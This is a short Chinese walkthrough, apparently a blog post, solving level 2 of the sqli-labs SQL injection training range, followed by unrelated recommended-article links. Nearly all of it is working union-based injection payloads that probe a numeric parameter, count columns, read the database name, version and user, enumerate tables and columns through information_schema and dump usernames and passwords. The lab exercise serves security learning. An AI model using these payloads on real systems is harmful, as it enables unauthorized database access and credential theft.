SQL注入sqli_labs靶场第二题

解题思路与第一题相同

?id=1 and 1=1 和?id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为数字型注入。

联合查询:

猜解列名数量:3

?id=1 order by 4

判断回显点

?id=-1 union select 1,2,3

爆库、版本号、权限

?id=-1 union select 1,database(),version()--+
?id=-1 union select 1,2,user()--+

爆表、爆列

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

爆账号密码

?id=-1 union select 1,2,(select group_concat(username,password))from users

相关推荐
不太厉害的程序员33 分钟前
Oracle使用工具PL/SQL Developer中的数据泵备份还原数据库
数据库·sql·oracle
三十六煩惱風35 分钟前
2026-05/04~10技术问题处理
java·数据库·sql
我叫张小白。1 小时前
MySQL架构与SQL执行完全解析
sql·mysql·架构
顾凌陵1 小时前
SQL注入漏洞
数据库·sql·oracle
洛水水2 小时前
数据库连接池详解
数据库·c++·mysql
WL_Aurora2 小时前
MySQL慢查询分析与优化实战
mysql·性能优化·慢查询·查询优化
小江的记录本2 小时前
【Java基础】Java 8-21新特性 :JDK17:密封类、模式匹配、Record类(附《思维导图》+《面试高频考点清单》)
java·数据结构·后端·python·mysql·面试·职场和发展
小江的记录本2 小时前
【Java基础】集合框架: ArrayList vs LinkedList 核心区别、扩容机制(附《思维导图》+《面试高频考点清单》)
java·数据库·python·mysql·spring·面试·maven
石小千2 小时前
mysql8全文检索
mysql·全文检索
wujt88882 小时前
mysql 比较数据库
数据库·mysql·oracle